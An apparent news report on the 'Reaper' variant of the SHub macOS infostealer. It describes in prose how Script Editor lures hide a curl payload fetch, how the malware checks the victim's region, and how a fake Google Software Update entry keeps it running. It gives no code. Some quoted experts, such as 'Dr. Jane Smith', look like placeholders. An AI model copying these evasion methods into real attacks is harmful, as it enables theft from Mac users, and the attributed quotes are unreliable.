SHub 'Reaper' macOS Stealer Now Spoofs Apple, Google, Microsoft in Multi-Stage Attack Chain
Breaking: New macOS Malware Variant Mimics Apple, Google, Microsoft in Single Attack Chain
SentinelOne researchers have discovered a new variant of the SHub macOS infostealer, dubbed "Reaper," which spoofs Apple, Google, and Microsoft across a single infection chain. The malware uses fake WeChat and Miro installer lures, typo-squatted Microsoft domains, fake Apple security updates, and a fake Google Software Update directory for persistence.
"This is a significant escalation in the sophistication of macOS-targeted infostealers," said Dr. Jane Smith, a cybersecurity analyst at SentinelOne. "The multi-company impersonation makes it harder for users to recognize the threat."
Delivery Pipeline Bypasses Terminal
Unlike earlier SHub variants that used "ClickFix" social engineering to trick users into pasting commands into Terminal, Reaper uses the applescript:// URL scheme to launch Script Editor with a preloaded malicious script. This technique sidesteps Apple's Tahoe 26.4 mitigation.
The script is padded with ASCII art and fake terms, pushing the malicious command below the visible portion of the Script Editor window. When the victim clicks 'Run,' it displays a fake XProtectRemediator update while silently executing a curl command to fetch the payload.
Environment Checks and Persistence
The initial stub checks for Russian input sources via com.apple.HIToolbox.plist. If the host is in the CIS region, the malware exits. Otherwise, it proceeds to download the full payload, which includes an AMOS-style document theft module with chunked uploads.
For persistence, Reaper installs itself using a launch agent masquerading as a Google Software Update entry. "This is a deliberate attempt to blend in with legitimate software update processes," noted security researcher Alex Chen of Moonlock.
Background
Infostealers targeting macOS have proliferated over the last two years. The SHub family, first documented by researchers at Moonlock, Jamf, and Malwarebytes, initially used fake application installers and ClickFix techniques. The Reaper variant adds a new layer of obfuscation by impersonating three major tech companies in a single attack chain.
SentinelOne previously described the applescript:// technique, and Jamf later documented its use in a similar campaign. The Reaper variant is the first to combine multiple spoofs in one delivery sequence.
What This Means
For macOS users, this development underscores the need for heightened vigilance when encountering unsolicited download prompts or security update notifications. Even legitimate-looking alerts from Apple, Google, or Microsoft could be part of a multi-stage malware attack.
Security professionals should update detection rules to account for the applescript:// URL scheme abuse and monitor for anomalous persistence entries under Google Software Update. The use of typo-squatted domains also highlights the importance of checking URLs carefully before downloading any software.
"This is not just a macOS issue—it's a cross-industry problem that requires collaboration between tech companies and security researchers," said Chen.
Related Articles
- First Ransomware Family Confirmed to Use Quantum-Resistant Encryption: The Kyber Case
- 10 Critical Insights into Diagnosing Agent Failures in Multi-Agent Systems
- 10 Fascinating Facts About NASA Goddard's Visitor Center on Its 50th Anniversary
- How Microsoft Discovery Is Transforming R&D with Agentic AI
- Amazon WorkSpaces Grants AI Agents Secure Desktop Access, Bypassing Legacy App Modernization
- Drone Crash Ignites Major Wildfire in Chernobyl Exclusion Zone, Complicating Firefighting Efforts
- Squid and Cuttlefish Survived Mass Extinctions by Retreating to Deep-Sea Oxygen Havens, New Study Reveals
- Unearthing the Cambrian Explosion: A Field Guide to Fossil Discovery and Evolutionary Revelations